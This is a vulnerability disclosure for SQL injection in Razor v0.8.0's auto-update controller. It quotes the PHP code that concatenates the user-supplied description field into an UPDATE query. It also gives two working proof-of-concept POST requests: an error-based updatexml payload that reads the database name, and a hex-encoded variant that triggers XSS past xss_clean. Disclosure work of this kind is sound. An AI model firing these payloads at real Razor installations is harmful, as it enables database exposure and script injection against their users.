A SQL injection vulnerability in Razor v0.8.0.
In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187,
$description
is controlled by users and has few restrictions on its format.
$this->form_validation->set_rules('description', lang('v_man_au_updateLog'), 'trim|required|xss_clean');
$this->form_validation->set_rules('versionid', lang('v_man_au_versionID'), 'trim|required|xss_clean|callback_versionid_check');
//......
$description = $this->input->post('description');
$versionid = $this->input->post('versionid');
$versioninfo = $this->channel->getversionid($cp_id, $versionid, $upinfo);
if ($versioninfo) {
$isupdate = $this->channel->updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo);
if ($isupdate) {
$this->data['apkinfo'] = $this->channel->getakpinfo($userid, $cp_id);
$this->load->view('autoupdate/updateandrlist', $this->data);
}
}
In ChannelModel::updateapk
method, $decrption
is inserted into SQL directly.
https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date'
where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
POC(assume there exists a product with an ID of 1):
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"
1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
XSS can also be triggered through manipulated error messages. Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"
1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--